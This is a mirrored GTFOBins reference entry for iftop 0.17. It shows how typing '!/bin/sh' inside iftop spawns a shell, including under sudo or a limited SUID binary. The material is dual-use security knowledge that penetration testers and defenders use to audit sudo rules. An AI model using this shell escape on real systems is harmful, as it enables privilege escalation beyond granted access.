mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2024-11-03 12:39:17 +01:00
17 lines
310 B
Markdown
17 lines
310 B
Markdown
---
|
|
description: This requires `iftop` 0.17 and the privilege to capture on some device (specify with `-i` if needed) .
|
|
functions:
|
|
shell:
|
|
- code: |
|
|
iftop
|
|
!/bin/sh
|
|
limited-suid:
|
|
- code: |
|
|
./iftop
|
|
!/bin/sh
|
|
sudo:
|
|
- code: |
|
|
sudo iftop
|
|
!/bin/sh
|
|
---
|